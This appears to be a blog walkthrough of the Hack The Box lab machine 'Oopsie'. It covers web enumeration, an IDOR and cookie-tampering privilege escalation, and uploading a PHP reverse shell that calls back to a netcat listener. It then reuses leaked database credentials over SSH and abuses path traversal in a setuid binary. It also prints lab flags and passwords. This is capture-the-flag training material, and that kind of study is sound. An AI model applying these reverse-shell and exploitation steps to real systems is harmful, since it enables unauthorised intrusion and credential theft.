top of page

Oopsie



Enumeration


As usual let's start with nmap

nmap -sV -sC 10.129.95.191

Port 80 is open so let's check the website.

Open your browser and type in the url bar: http://10.129.95.191


As usual let's start with gobuster. Locate the wordlist we are going to use first.

locate big.txt

Let's use the wordlist :

/opt/useful/SecLists/Discovery/Web-Content/big.txt


gobuster dir -u 10.129.95.191 -w /opt/useful/SecLists/Discovery/Web-Content/big.txt

Let's use BurpSuite. Open Burpsuite and click on the Proxy tab

Turn off intercept

Click on Open Browser

In the url bar, type http://10.129.95.191

Go back to Burp and click on the Target tab

We found something interested, a directory called /cdn-cgi/login

This directory was not picked up by our gobuster earlier.


Let's open our browser from our VM and in the url bar, type:

http://10.129.95.191/cdn-cgi/login

We do not know any credentials but there is a link "Login as Guest"

Click on "Login as Guest"


We are logged in!


Let's click on Account

We are logged in as user guest, access ID 2233


Look at the url bar:


What if we were to change &id=2 into &id=1


Let's try, change the url at the end and press enter

Now we can see there is another user called admin with access ID 34322


We were not meant to see that, but it is a vulnerability of the target machine.


So we just learned that the user guest has a access ID of 2233 and the user admin has a access ID of 34322


Now let's click on the Uploads tab on the website:

This action require super admin rights. So if we had super admin rights, we would be able to upload files to the target machine. Interesting!


Right click on this web page and click on Inspect (Q)

Now Click on the Storage tab, we can see the following cookie:

At the moment we are logged in as the user guest with access ID 2233

What if we could change the cookie so that we are now user admin with access ID 34322


Let's try! Replace guest by admin and replace 2233 by 34322

Now refresh the uploads page and we now get the following:


We are now admin and we can now upload files!




Foothold


Now let's try to upload a file.


Let's first locate the php reverse shell file and edit it


Open a new command prompt from your VM and type:

locate webshells/php

cd /usr/share/webshells/php  

then:

ls

We are interested in php-reverse-shell.php


Let's make a copy of this file into our home directory by typing:

cp php-reverse-shell.php /home/htb-sneakymouse/oopsie.php 
My username is htb-sneakymouse on my VM, this is why I used /htb_sneakymouse Replace this by your own username.

Now open a brand new command prompt and type:

ls

I can see oopsie.php has been successfully copied to my home directory.

Let's now edit oopsie.php using:

sudo nano oopsie.php

Scroll down until you see $ip and $port

we need to change both ip and port

- replace 127.0.0.1 by the IP of your VM. If you don't know your IP, open a new command prompt window and type ifconfig tun0

- replace 1234 by 4444 (we will listen on port 4444 when we set up our netcat later)

Press Ctrl + X to exit

Press Y (to save)

Press enter


Now let's upload this file on the target machine. Let's go back to the upload tab on the website:

We can now click on Browse

We select our file oopsie.php and click on Open

Now click on Upload

Looks like our file oopsie.php has been uploaded successfully. However we still don't know where it has been uploaded.


Remember earlier when we did the gobuster command, it found a directory called /uploads

Perhaps this is where the file has been uploaded!


First let's set up our netcat listener on port 4444. From your VM, open a new command prompt window and type:

nc -lnvp 4444

Now let's try to locate and run oopsie.php we just uploaded to our target machine. In the url search bar, type:


Nothing should happen but if you go back to your netcat (nc) command prompt, you should now have a shell:

Type

whoami

Let's upgrade our shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

ls

cd home 
ls


cd robert
ls

cat user.txt

f2c74ee8db7983851ab2a96a44eb7981


Congratulations! you got the user flag!




Lateral Movement


sudo -l

Unfortunately, we don't have the password


Let's explore the files on the target machine. Let's start with var/www/html

cd /var/www/html

ls

cd cdn-cgi
ls

cd login
ls

cat db.php

Looks like we found some credentials

username: robert

password: M3g4C0rpUs3r!


This shell is not super stable but now we have some credentials!


We know from the nmap at the beginning that port 22 which is associated with ssh is open on the target machine. Let's try to ssh using roberts' credentials

ssh robert@10.129.95.191

The password is

M3g4C0rpUs3r!


We are in!

id

Privilege Escalation

locate bugtracker

cd /usr/bin

bugtracker

type 1 for instance



bugtracker

this time, type hello for instance

Interesting this time we get /root/reports/hello: No such file or directory


bugtracker

this time type:

../root.txt

Congratulations! you found the root flag!


af13b0bee69f8a877c3faf667f7beacf

7,095 views0 comments

Recent Posts

See All

Vaccine

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page